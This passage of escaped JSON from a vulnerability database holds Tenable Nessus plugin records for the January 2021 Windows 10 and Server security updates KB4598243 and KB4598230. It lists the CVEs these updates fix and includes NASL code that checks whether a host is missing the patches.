\"CVE-2021-1686\",\n \"CVE-2021-1687\",\n \"CVE-2021-1688\",\n \"CVE-2021-1689\",\n \"CVE-2021-1690\",\n \"CVE-2021-1692\",\n \"CVE-2021-1693\",\n \"CVE-2021-1694\",\n \"CVE-2021-1695\",\n \"CVE-2021-1696\",\n \"CVE-2021-1697\",\n \"CVE-2021-1699\",\n \"CVE-2021-1700\",\n \"CVE-2021-1701\",\n \"CVE-2021-1702\",\n \"CVE-2021-1704\",\n \"CVE-2021-1705\",\n \"CVE-2021-1706\",\n \"CVE-2021-1708\",\n \"CVE-2021-1709\",\n \"CVE-2021-1710\"\n );\n script_xref(name:\"IAVA\", value:\"2021-A-0015\");\n script_xref(name:\"MSKB\", value:\"4598243\");\n script_xref(name:\"MSFT\", value:\"MS21-4598243\");\n script_xref(name:\"IAVA\", value:\"2021-A-0022\");\n script_xref(name:\"IAVA\", value:\"2021-A-0023\");\n\n script_name(english:\"KB4598243: Windows 10 Version 1607 and Windows Server 2016 January 2021 Security Update\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows host is missing security updates. It is, therefore, affected by multiple vulnerabilities:\n\n - Windows AppX Deployment Extensions Elevation of Privilege Vulnerability This CVE ID is unique from\n CVE-2021-1685. (CVE-2021-1642)\n\n - Windows DNS Query Information Disclosure Vulnerability (CVE-2021-1637)\n\n - Diagnostics Hub Standard Collector Elevation of Privilege Vulnerability This CVE ID is unique from\n CVE-2021-1680. (CVE-2021-1651)\n\n - Windows CSC Service Elevation of Privilege Vulnerability This CVE ID is unique from CVE-2021-1653,\n CVE-2021-1654, CVE-2021-1655, CVE-2021-1659, CVE-2021-1688, CVE-2021-1693. (CVE-2021-1652)\n\n - Windows CSC Service Elevation of Privilege Vulnerability This CVE ID is unique from CVE-2021-1652,\n CVE-2021-1654, CVE-2021-1655, CVE-2021-1659, CVE-2021-1688, CVE-2021-1693. (CVE-2021-1653)\n\n - Windows CSC Service Elevation of Privilege Vulnerability This CVE ID is unique from CVE-2021-1652,\n CVE-2021-1653, CVE-2021-1655, CVE-2021-1659, CVE-2021-1688, CVE-2021-1693. (CVE-2021-1654)\n\n - Windows CSC Service Elevation of Privilege Vulnerability This CVE ID is unique from CVE-2021-1652,\n CVE-2021-1653, CVE-2021-1654, CVE-2021-1659, CVE-2021-1688, CVE-2021-1693. (CVE-2021-1655)\n\n - TPM Device Driver Information Disclosure Vulnerability (CVE-2021-1656)\n\n - Windows Fax Compose Form Remote Code Execution Vulnerability (CVE-2021-1657)\n\n - Remote Procedure Call Runtime Remote Code Execution Vulnerability This CVE ID is unique from\n CVE-2021-1660, CVE-2021-1664, CVE-2021-1666, CVE-2021-1667, CVE-2021-1671, CVE-2021-1673, CVE-2021-1700,\n CVE-2021-1701. (CVE-2021-1658)\n\n - Windows CSC Service Elevation of Privilege Vulnerability This CVE ID is unique from CVE-2021-1652,\n CVE-2021-1653, CVE-2021-1654, CVE-2021-1655, CVE-2021-1688, CVE-2021-1693. (CVE-2021-1659)\n\n - Remote Procedure Call Runtime Remote Code Execution Vulnerability This CVE ID is unique from\n CVE-2021-1658, CVE-2021-1664, CVE-2021-1666, CVE-2021-1667, CVE-2021-1671, CVE-2021-1673, CVE-2021-1700,\n CVE-2021-1701. (CVE-2021-1660)\n\n - Windows Installer Elevation of Privilege Vulnerability (CVE-2021-1661)\n\n - Remote Procedure Call Runtime Remote Code Execution Vulnerability This CVE ID is unique from\n CVE-2021-1658, CVE-2021-1660, CVE-2021-1666, CVE-2021-1667, CVE-2021-1671, CVE-2021-1673, CVE-2021-1700,\n CVE-2021-1701. (CVE-2021-1664)\n\n - GDI+ Remote Code Execution Vulnerability (CVE-2021-1665)\n\n - Remote Procedure Call Runtime Remote Code Execution Vulnerability This CVE ID is unique from\n CVE-2021-1658, CVE-2021-1660, CVE-2021-1664, CVE-2021-1667, CVE-2021-1671, CVE-2021-1673, CVE-2021-1700,\n CVE-2021-1701. (CVE-2021-1666)\n\n - Remote Procedure Call Runtime Remote Code Execution Vulnerability This CVE ID is unique from\n CVE-2021-1658, CVE-2021-1660, CVE-2021-1664, CVE-2021-1666, CVE-2021-1671, CVE-2021-1673, CVE-2021-1700,\n CVE-2021-1701. (CVE-2021-1667)\n\n - Microsoft DTV-DVD Video Decoder Remote Code Execution Vulnerability (CVE-2021-1668)\n\n - Windows Remote Desktop Security Feature Bypass Vulnerability (CVE-2021-1669)\n\n - Remote Procedure Call Runtime Remote Code Execution Vulnerability This CVE ID is unique from\n CVE-2021-1658, CVE-2021-1660, CVE-2021-1664, CVE-2021-1666, CVE-2021-1667, CVE-2021-1673, CVE-2021-1700,\n CVE-2021-1701. (CVE-2021-1671)\n\n - Remote Procedure Call Runtime Remote Code Execution Vulnerability This CVE ID is unique from\n CVE-2021-1658, CVE-2021-1660, CVE-2021-1664, CVE-2021-1666, CVE-2021-1667, CVE-2021-1671, CVE-2021-1700,\n CVE-2021-1701. (CVE-2021-1673)\n\n - Windows Remote Desktop Protocol Core Security Feature Bypass Vulnerability (CVE-2021-1674)\n\n - Windows NT Lan Manager Datagram Receiver Driver Information Disclosure Vulnerability (CVE-2021-1676)\n\n - Windows CryptoAPI Denial of Service Vulnerability (CVE-2021-1679)\n\n - Diagnostics Hub Standard Collector Elevation of Privilege Vulnerability This CVE ID is unique from\n CVE-2021-1651. (CVE-2021-1680)\n\n - Windows WalletService Elevation of Privilege Vulnerability This CVE ID is unique from CVE-2021-1686,\n CVE-2021-1687, CVE-2021-1690. (CVE-2021-1681)\n\n - Windows Bluetooth Security Feature Bypass Vulnerability This CVE ID is unique from CVE-2021-1638,\n CVE-2021-1684. (CVE-2021-1683)\n\n - Windows Bluetooth Security Feature Bypass Vulnerability This CVE ID is unique from CVE-2021-1638,\n CVE-2021-1683. (CVE-2021-1684)\n\n - Windows AppX Deployment Extensions Elevation of Privilege Vulnerability This CVE ID is unique from\n CVE-2021-1642. (CVE-2021-1685)\n\n - Windows WalletService Elevation of Privilege Vulnerability This CVE ID is unique from CVE-2021-1681,\n CVE-2021-1687, CVE-2021-1690. (CVE-2021-1686)\n\n - Windows WalletService Elevation of Privilege Vulnerability This CVE ID is unique from CVE-2021-1681,\n CVE-2021-1686, CVE-2021-1690. (CVE-2021-1687)\n\n - Windows CSC Service Elevation of Privilege Vulnerability This CVE ID is unique from CVE-2021-1652,\n CVE-2021-1653, CVE-2021-1654, CVE-2021-1655, CVE-2021-1659, CVE-2021-1693. (CVE-2021-1688)\n\n - Windows Multipoint Management Elevation of Privilege Vulnerability (CVE-2021-1689)\n\n - Windows WalletService Elevation of Privilege Vulnerability This CVE ID is unique from CVE-2021-1681,\n CVE-2021-1686, CVE-2021-1687. (CVE-2021-1690)\n\n - Hyper-V Denial of Service Vulnerability This CVE ID is unique from CVE-2021-1691. (CVE-2021-1692)\n\n - Windows CSC Service Elevation of Privilege Vulnerability This CVE ID is unique from CVE-2021-1652,\n CVE-2021-1653, CVE-2021-1654, CVE-2021-1655, CVE-2021-1659, CVE-2021-1688. (CVE-2021-1693)\n\n - Windows Update Stack Elevation of Privilege Vulnerability (CVE-2021-1694)\n\n - Windows Print Spooler Elevation of Privilege Vulnerability (CVE-2021-1695)\n\n - Windows Graphics Component Information Disclosure Vulnerability (CVE-2021-1696)\n\n - Windows InstallService Elevation of Privilege Vulnerability (CVE-2021-1697)\n\n - Windows GDI+ Information Disclosure Vulnerability (CVE-2021-1708)\n\n - Windows Win32k Elevation of Privilege Vulnerability (CVE-2021-1709)\n\n - Microsoft Windows Media Foundation Remote Code Execution Vulnerability (CVE-2021-1710)\n\n - Windows Runtime C++ Template Library Elevation of Privilege Vulnerability (CVE-2021-1650)\n\n - Active Template Library Elevation of Privilege Vulnerability (CVE-2021-1649)\n\n - Microsoft splwow64 Elevation of Privilege Vulnerability (CVE-2021-1648)\n\n - Windows Docker Information Disclosure Vulnerability (CVE-2021-1645)\n\n - NTLM Security Feature Bypass Vulnerability (CVE-2021-1678)\n\n - Windows (modem.sys) Information Disclosure Vulnerability (CVE-2021-1699)\n\n - Remote Procedure Call Runtime Remote Code Execution Vulnerability This CVE ID is unique from\n CVE-2021-1658, CVE-2021-1660, CVE-2021-1664, CVE-2021-1666, CVE-2021-1667, CVE-2021-1671, CVE-2021-1673,\n CVE-2021-1701. (CVE-2021-1700)\n\n - Remote Procedure Call Runtime Remote Code Execution Vulnerability This CVE ID is unique from\n CVE-2021-1658, CVE-2021-1660, CVE-2021-1664, CVE-2021-1666, CVE-2021-1667, CVE-2021-1671, CVE-2021-1673,\n CVE-2021-1700. (CVE-2021-1701)\n\n - Windows Remote Procedure Call Runtime Elevation of Privilege Vulnerability (CVE-2021-1702)\n\n - Windows Hyper-V Elevation of Privilege Vulnerability (CVE-2021-1704)\n\n - Microsoft Edge (HTML-based) Memory Corruption Vulnerability (CVE-2021-1705)\n\n - Windows LUAFV Elevation of Privilege Vulnerability (CVE-2021-1706)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version\nnumber.\");\n # https://support.microsoft.com/en-us/help/4598243/windows-10-update-kb4598243\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?1b30e3c7\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply Cumulative Update KB4598243.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2021-1668\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2021/01/12\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2021/01/12\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2021/01/12\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"smb_check_rollup.nasl\", \"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude('smb_func.inc');\ninclude('smb_hotfixes.inc');\ninclude('smb_hotfixes_fcheck.inc');\ninclude('smb_reg_query.inc');\n\nget_kb_item_or_exit('SMB/MS_Bulletin_Checks/Possible');\n\nbulletin = 'MS21-01';\nkbs = make_list(\n '4598243'\n);\n\nif (get_kb_item('Host/patch_management_checks')) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit('SMB/Registry/Enumerated');\nget_kb_item_or_exit('SMB/WindowsVersion', exit_code:1);\n\nif (hotfix_check_sp_range(win10:'0') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\nshare = hotfix_get_systemdrive(as_share:TRUE, exit_on_fail:TRUE);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nif (\n smb_check_rollup(os:'10',\n sp:0,\n os_build:'14393',\n rollup_date:'01_2021',\n bulletin:bulletin,\n rollup_kb_list:[4598243])\n)\n{\n replace_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-02-13T14:19:49", "description": "The remote Windows host is missing security updates. It is, therefore, affected by multiple vulnerabilities:\n\n - Windows AppX Deployment Extensions Elevation of Privilege Vulnerability This CVE ID is unique from\n CVE-2021-1685. (CVE-2021-1642)\n\n - Windows DNS Query Information Disclosure Vulnerability (CVE-2021-1637)\n\n - Diagnostics Hub Standard Collector Elevation of Privilege Vulnerability This CVE ID is unique from\n CVE-2021-1680. (CVE-2021-1651)\n\n - Windows CSC Service Elevation of Privilege Vulnerability This CVE ID is unique from CVE-2021-1653,\n CVE-2021-1654, CVE-2021-1655, CVE-2021-1659, CVE-2021-1688, CVE-2021-1693. (CVE-2021-1652)\n\n - Windows CSC Service Elevation of Privilege Vulnerability This CVE ID is unique from CVE-2021-1652,\n CVE-2021-1654, CVE-2021-1655, CVE-2021-1659, CVE-2021-1688, CVE-2021-1693. (CVE-2021-1653)\n\n - Windows CSC Service Elevation of Privilege Vulnerability This CVE ID is unique from CVE-2021-1652,\n CVE-2021-1653, CVE-2021-1655, CVE-2021-1659, CVE-2021-1688, CVE-2021-1693. (CVE-2021-1654)\n\n - Windows CSC Service Elevation of Privilege Vulnerability This CVE ID is unique from CVE-2021-1652,\n CVE-2021-1653, CVE-2021-1654, CVE-2021-1659, CVE-2021-1688, CVE-2021-1693. (CVE-2021-1655)\n\n - TPM Device Driver Information Disclosure Vulnerability (CVE-2021-1656)\n\n - Windows Fax Compose Form Remote Code Execution Vulnerability (CVE-2021-1657)\n\n - Remote Procedure Call Runtime Remote Code Execution Vulnerability This CVE ID is unique from\n CVE-2021-1660, CVE-2021-1664, CVE-2021-1666, CVE-2021-1667, CVE-2021-1671, CVE-2021-1673, CVE-2021-1700,\n CVE-2021-1701. (CVE-2021-1658)\n\n - Windows CSC Service Elevation of Privilege Vulnerability This CVE ID is unique from CVE-2021-1652,\n CVE-2021-1653, CVE-2021-1654, CVE-2021-1655, CVE-2021-1688, CVE-2021-1693. (CVE-2021-1659)\n\n - Remote Procedure Call Runtime Remote Code Execution Vulnerability This CVE ID is unique from\n CVE-2021-1658, CVE-2021-1664, CVE-2021-1666, CVE-2021-1667, CVE-2021-1671, CVE-2021-1673, CVE-2021-1700,\n CVE-2021-1701. (CVE-2021-1660)\n\n - Windows Installer Elevation of Privilege Vulnerability (CVE-2021-1661)\n\n - Windows Event Tracing Elevation of Privilege Vulnerability (CVE-2021-1662)\n\n - Remote Procedure Call Runtime Remote Code Execution Vulnerability This CVE ID is unique from\n CVE-2021-1658, CVE-2021-1660, CVE-2021-1666, CVE-2021-1667, CVE-2021-1671, CVE-2021-1673, CVE-2021-1700,\n CVE-2021-1701. (CVE-2021-1664)\n\n - GDI+ Remote Code Execution Vulnerability (CVE-2021-1665)\n\n - Remote Procedure Call Runtime Remote Code Execution Vulnerability This CVE ID is unique from\n CVE-2021-1658, CVE-2021-1660, CVE-2021-1664, CVE-2021-1667, CVE-2021-1671, CVE-2021-1673, CVE-2021-1700,\n CVE-2021-1701. (CVE-2021-1666)\n\n - Remote Procedure Call Runtime Remote Code Execution Vulnerability This CVE ID is unique from\n CVE-2021-1658, CVE-2021-1660, CVE-2021-1664, CVE-2021-1666, CVE-2021-1671, CVE-2021-1673, CVE-2021-1700,\n CVE-2021-1701. (CVE-2021-1667)\n\n - Microsoft DTV-DVD Video Decoder Remote Code Execution Vulnerability (CVE-2021-1668)\n\n - Windows Remote Desktop Security Feature Bypass Vulnerability (CVE-2021-1669)\n\n - Remote Procedure Call Runtime Remote Code Execution Vulnerability This CVE ID is unique from\n CVE-2021-1658, CVE-2021-1660, CVE-2021-1664, CVE-2021-1666, CVE-2021-1667, CVE-2021-1673, CVE-2021-1700,\n CVE-2021-1701. (CVE-2021-1671)\n\n - Windows Projected File System FS Filter Driver Information Disclosure Vulnerability This CVE ID is unique\n from CVE-2021-1663, CVE-2021-1670. (CVE-2021-1672)\n\n - Remote Procedure Call Runtime Remote Code Execution Vulnerability This CVE ID is unique from\n CVE-2021-1658, CVE-2021-1660, CVE-2021-1664, CVE-2021-1666, CVE-2021-1667, CVE-2021-1671, CVE-2021-1700,\n CVE-2021-1701. (CVE-2021-1673)\n\n - Windows Remote Desktop Protocol Core Security Feature Bypass Vulnerability (CVE-2021-1674)\n\n - Windows NT Lan Manager Datagram Receiver Driver Information Disclosure Vulnerability (CVE-2021-1676)\n\n - Windows CryptoAPI Denial of Service Vulnerability (CVE-2021-1679)\n\n - Diagnostics Hub Standard Collector Elevation of Privilege Vulnerability This CVE ID is unique from\n CVE-2021-1651. (CVE-2021-1680)\n\n - Windows WalletService Elevation of Privilege Vulnerability This CVE ID is unique from CVE-2021-1686,\n CVE-2021-1687, CVE-2021-1690. (CVE-2021-1681)\n\n - Windows Kernel Elevation of Privilege Vulnerability (CVE-2021-1682)\n\n - Windows Bluetooth Security Feature Bypass Vulnerability This CVE ID is unique from CVE-2021-1638,\n CVE-2021-1684. (CVE-2021-1683)\n\n - Windows Bluetooth Security Feature Bypass Vulnerability This CVE ID is unique from CVE-2021-1638,\n CVE-2021-1683. (CVE-2021-1684)\n\n - Windows AppX Deployment Extensions Elevation of Privilege Vulnerability This CVE ID is unique from\n CVE-2021-1642. (CVE-2021-1685)\n\n - Windows WalletService Elevation of Privilege Vulnerability This CVE ID is unique from CVE-2021-1681,\n CVE-2021-1687, CVE-2021-1690. (CVE-2021-1686)\n\n - Windows WalletService Elevation of Privilege Vulnerability This CVE ID is unique from CVE-2021-1681,\n CVE-2021-1686, CVE-2021-1690. (CVE-2021-1687)\n\n - Windows CSC Service Elevation of Privilege Vulnerability This CVE ID is unique from CVE-2021-1652,\n CVE-2021-1653, CVE-2021-1654, CVE-2021-1655, CVE-2021-1659, CVE-2021-1693. (CVE-2021-1688)\n\n - Windows Multipoint Management Elevation of Privilege Vulnerability (CVE-2021-1689)\n\n - Windows WalletService Elevation of Privilege Vulnerability This CVE ID is unique from CVE-2021-1681,\n CVE-2021-1686, CVE-2021-1687. (CVE-2021-1690)\n\n - Windows CSC Service Elevation of Privilege Vulnerability This CVE ID is unique from CVE-2021-1652,\n CVE-2021-1653, CVE-2021-1654, CVE-2021-1655, CVE-2021-1659, CVE-2021-1688. (CVE-2021-1693)\n\n - Windows Update Stack Elevation of Privilege Vulnerability (CVE-2021-1694)\n\n - Windows Print Spooler Elevation of Privilege Vulnerability (CVE-2021-1695)\n\n - Windows Graphics Component Information Disclosure Vulnerability (CVE-2021-1696)\n\n - Windows InstallService Elevation of Privilege Vulnerability (CVE-2021-1697)\n\n - Windows GDI+ Information Disclosure Vulnerability (CVE-2021-1708)\n\n - Windows Win32k Elevation of Privilege Vulnerability (CVE-2021-1709)\n\n - Microsoft Windows Media Foundation Remote Code Execution Vulnerability (CVE-2021-1710)\n\n - Windows Runtime C++ Template Library Elevation of Privilege Vulnerability (CVE-2021-1650)\n\n - Active Template Library Elevation of Privilege Vulnerability (CVE-2021-1649)\n\n - Microsoft splwow64 Elevation of Privilege Vulnerability (CVE-2021-1648)\n\n - Windows WLAN Service Elevation of Privilege Vulnerability (CVE-2021-1646)\n\n - Windows Docker Information Disclosure Vulnerability (CVE-2021-1645)\n\n - Windows Bluetooth Security Feature Bypass Vulnerability This CVE ID is unique from CVE-2021-1683,\n CVE-2021-1684. (CVE-2021-1638)\n\n - NTLM Security Feature Bypass Vulnerability (CVE-2021-1678)\n\n - Windows (modem.sys) Information Disclosure Vulnerability (CVE-2021-1699)\n\n - Remote Procedure Call Runtime Remote Code Execution Vulnerability This CVE ID is unique from\n CVE-2021-1658, CVE-2021-1660, CVE-2021-1664, CVE-2021-1666, CVE-2021-1667, CVE-2021-1671, CVE-2021-1673,\n CVE-2021-1701. (CVE-2021-1700)\n\n - Remote Procedure Call Runtime Remote Code Execution Vulnerability This CVE ID is unique from\n CVE-2021-1658, CVE-2021-1660, CVE-2021-1664, CVE-2021-1666, CVE-2021-1667, CVE-2021-1671, CVE-2021-1673,\n CVE-2021-1700. (CVE-2021-1701)\n\n - Windows Remote Procedure Call Runtime Elevation of Privilege Vulnerability (CVE-2021-1702)\n\n - Windows Hyper-V Elevation of Privilege Vulnerability (CVE-2021-1704)\n\n - Microsoft Edge (HTML-based) Memory Corruption Vulnerability (CVE-2021-1705)\n\n - Windows LUAFV Elevation of Privilege Vulnerability (CVE-2021-1706)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version\nnumber.", "edition": 6, "cvss3": {"score": 7.8, "vector": "AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"}, "published": "2021-01-12T00:00:00", "title": "KB4598230: Windows 10 Version 1809 and Windows Server 2019 January 2021 Security Update", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2021-1667", "CVE-2021-1684", "CVE-2021-1682", "CVE-2021-1681", "CVE-2021-1676", "CVE-2021-1679", "CVE-2021-1700", "CVE-2021-1710", "CVE-2021-1666", "CVE-2021-1685", "CVE-2021-1638", "CVE-2021-1687", "CVE-2021-1664", "CVE-2021-1697", "CVE-2021-1702", "CVE-2021-1693", "CVE-2021-1669", "CVE-2021-1673", "CVE-2021-1662", "CVE-2021-1701", "CVE-2021-1688", "CVE-2021-1642", "CVE-2021-1650", "CVE-2021-1699", "CVE-2021-1656", "CVE-2021-1704", "CVE-2021-1655", "CVE-2021-1653", "CVE-2021-1695", "CVE-2021-1648", "CVE-2021-1654", "CVE-2021-1678", "CVE-2021-1670", "CVE-2021-1689", "CVE-2021-1668", "CVE-2021-1694", "CVE-2021-1645", "CVE-2021-1680", "CVE-2021-1661", "CVE-2021-1649", "CVE-2021-1651", "CVE-2021-1708", "CVE-2021-1672", "CVE-2021-1683", "CVE-2021-1659", "CVE-2021-1709", "CVE-2021-1652", "CVE-2021-1637", "CVE-2021-1686", "CVE-2021-1658", "CVE-2021-1671", "CVE-2021-1663", "CVE-2021-1690", "CVE-2021-1660", "CVE-2021-1646", "CVE-2021-1706", "CVE-2021-1696", "CVE-2021-1665", "CVE-2021-1674", "CVE-2021-1657", "CVE-2021-1705"], "modified": "2021-01-12T00:00:00", "cpe": ["cpe:/o:microsoft:windows"], "id": "SMB_NT_MS21_JAN_4598230.NASL", "href": "https://www.tenable.com/plugins/nessus/144887", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from the Microsoft Security Updates API. The text\n# itself is copyright (C) Microsoft Corporation.\n#\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(144887);\n script_version(\"1.8\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/02/12\");\n\n script_cve_id(\n \"CVE-2021-1637\",\n \"CVE-2021-1638\",\n \"CVE-2021-1642\",\n \"CVE-2021-1645\",\n \"CVE-2021-1646\",\n \"CVE-2021-1648\",\n \"CVE-2021-1649\",\n \"CVE-2021-1650\",\n \"CVE-2021-1651\",\n \"CVE-2021-1652\",\n \"CVE-2021-1653\",\n \"CVE-2021-1654\",\n \"CVE-2021-1655\",\n \"CVE-2021-1656\",\n \"CVE-2021-1657\",\n \"CVE-2021-1658\",\n \"CVE-2021-1659\",\n \"CVE-2021-1660\",\n \"CVE-2021-1661\",\n \"CVE-2021-1662\",\n \"CVE-2021-1664\",\n \"CVE-2021-1665\",\n \"CVE-2021-1666\",\n \"CVE-2021-1667\",\n \"CVE-2021-1668\",\n \"CVE-2021-1669\",\n \"CVE-2021-1671\",\n \"CVE-2021-1672\",\n \"CVE-2021-1673\",\n \"CVE-2021-1674\",\n \"CVE-2021-1676\",\n \"CVE-2021-1678\",\n \"CVE-2021-1679\",\n \"CVE-2021-1680\",\n \"CVE-2021-1681\",\n \"CVE-2021-1682\",\n \"CVE-2021-1683\",\n \"CVE-2021-1684\",\n \"CVE-2021-1685\",\n \"CVE-2021-1686\",\n \"CVE-2021-1687\",\n \"CVE-2021-1688\",\n \"CVE-2021-1689\",\n \"CVE-2021-1690\",\n \"CVE-2021-1693\",\n \"CVE-2021-1694\",\n \"CVE-2021-1695\",\n \"CVE-2021-1696\",\n \"CVE-2021-1697\",\n \"CVE-2021-1699\",\n \"CVE-2021-1700\",\n \"CVE-2021-1701\",\n \"CVE-2021-1702\",\n \"CVE-2021-1704\",\n \"CVE-2021-1705\",\n \"CVE-2021-1706\",\n \"CVE-2021-1708\",\n \"CVE-2021-1709\",\n \"CVE-2021-1710\"\n );\n script_xref(name:\"IAVA\", value:\"2021-A-0015\");\n script_xref(name:\"MSKB\", value:\"4598230\");\n script_xref(name:\"MSFT\", value:\"MS21-4598230\");\n script_xref(name:\"IAVA\", value:\"2021-A-0022\");\n script_xref(name:\"IAVA\", value:\"2021-A-0023\");\n\n script_name(english:\"KB4598230: Windows 10 Version 1809 and Windows Server 2019 January 2021 Security Update\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows host is missing security updates. It is, therefore, affected by multiple vulnerabilities:\n\n - Windows AppX Deployment Extensions Elevation of Privilege Vulnerability This CVE ID is unique from\n CVE-2021-1685. (CVE-2021-1642)\n\n - Windows DNS Query Information Disclosure Vulnerability (CVE-2021-1637)\n\n - Diagnostics Hub Standard Collector Elevation of Privilege Vulnerability This CVE ID is unique from\n CVE-2021-1680. (CVE-2021-1651)\n\n - Windows CSC Service Elevation of Privilege Vulnerability This CVE ID is unique from CVE-2021-1653,\n CVE-2021-1654, CVE-2021-1655, CVE-2021-1659, CVE-2021-1688, CVE-2021-1693. (CVE-2021-1652)\n\n - Windows CSC Service Elevation of Privilege Vulnerability This CVE ID is unique from CVE-2021-1652,\n CVE-2021-1654, CVE-2021-1655, CVE-2021-1659, CVE-2021-1688, CVE-2021-1693. (CVE-2021-1653)\n\n - Windows CSC Service Elevation of Privilege Vulnerability This CVE ID is unique from CVE-2021-1652,\n CVE-2021-1653, CVE-2021-1655, CVE-2021-1659, CVE-2021-1688, CVE-2021-1693. (CVE-2021-1654)\n\n - Windows CSC Service Elevation of Privilege Vulnerability This CVE ID is unique from CVE-2021-1652,\n CVE-2021-1653, CVE-2021-1654, CVE-2021-1659, CVE-2021-1688, CVE-2021-1693. (CVE-2021-1655)\n\n - TPM Device Driver Information Disclosure Vulnerability (CVE-2021-1656)\n\n - Windows Fax Compose Form Remote Code Execution Vulnerability (CVE-2021-1657)\n\n - Remote Procedure Call Runtime Remote Code Execution Vulnerability This CVE ID is unique from\n CVE-2021-1660, CVE-2021-1664, CVE-2021-1666, CVE-2021-1667, CVE-2021-1671, CVE-2021-1673, CVE-2021-1700,\n CVE-2021-1701. (CVE-2021-1658)\n\n - Windows CSC Service Elevation of Privilege Vulnerability This CVE ID is unique from CVE-2021-1652,\n CVE-2021-1653, CVE-2021-1654, CVE-2021-1655, CVE-2021-1688, CVE-2021-1693. (CVE-2021-1659)\n\n - Remote Procedure Call Runtime Remote Code Execution Vulnerability This CVE ID is unique from\n CVE-2021-1658, CVE-2021-1664, CVE-2021-1666, CVE-2021-1667, CVE-2021-1671, CVE-2021-1673, CVE-2021-1700,\n CVE-2021-1701. (CVE-2021-1660)\n\n - Windows Installer Elevation of Privilege Vulnerability (CVE-2021-1661)\n\n - Windows Event Tracing Elevation of Privilege Vulnerability (CVE-2021-1662)\n\n - Remote Procedure Call Runtime Remote Code Execution Vulnerability This CVE ID is unique from\n CVE-2021-1658, CVE-2021-1660, CVE-2021-1666, CVE-2021-1667, CVE-2021-1671, CVE-2021-1673, CVE-2021-1700,\n CVE-2021-1701. (CVE-2021-1664)\n\n - GDI+ Remote Code Execution Vulnerability (CVE-2021-1665)\n\n - Remote Procedure Call Runtime Remote Code Execution Vulnerability This CVE ID is unique from\n CVE-2021-1658, CVE-2021-1660, CVE-2021-1664, CVE-2021-1667, CVE-2021-1671, CVE-2021-1673, CVE-2021-1700,\n CVE-2021-1701. (CVE-2021-1666)\n\n - Remote Procedure Call Runtime Remote Code Execution Vulnerability This CVE ID is unique from\n CVE-2021-1658, CVE-2021-1660, CVE-2021-1664, CVE-2021-1666, CVE-2021-1671, CVE-2021-1673, CVE-2021-1700,\n CVE-2021-1701. (CVE-2021-1667)\n\n - Microsoft DTV-DVD Video Decoder Remote Code Execution Vulnerability (CVE-2021-1668)\n\n - Windows Remote Desktop Security Feature Bypass Vulnerability (CVE-2021-1669)\n\n - Remote Procedure Call Runtime Remote Code Execution Vulnerability This CVE ID is unique from\n CVE-2021-1658, CVE-2021-1660, CVE-2021-1664, CVE-2021-1666, CVE-2021-1667, CVE-2021-1673, CVE-2021-1700,\n CVE-2021-1701. (CVE-2021-1671)\n\n - Windows Projected File System FS Filter Driver Information Disclosure Vulnerability This CVE ID is unique\n from CVE-2021-1663, CVE-2021-1670. (CVE-2021-1672)\n\n - Remote Procedure Call Runtime Remote Code Execution Vulnerability This CVE ID is unique from\n CVE-2021-1658, CVE-2021-1660, CVE-2021-1664, CVE-2021-1666, CVE-2021-1667, CVE-2021-1671, CVE-2021-1700,\n CVE-2021-1701. (CVE-2021-1673)\n\n - Windows Remote Desktop Protocol Core Security Feature Bypass Vulnerability (CVE-2021-1674)\n\n - Windows NT Lan Manager Datagram Receiver Driver Information Disclosure Vulnerability (CVE-2021-1676)\n\n - Windows CryptoAPI Denial of Service Vulnerability (CVE-2021-1679)\n\n - Diagnostics Hub Standard Collector Elevation of Privilege Vulnerability This CVE ID is unique from\n CVE-2021-1651. (CVE-2021-1680)\n\n - Windows WalletService Elevation of Privilege Vulnerability This CVE ID is unique from CVE-2021-1686,\n 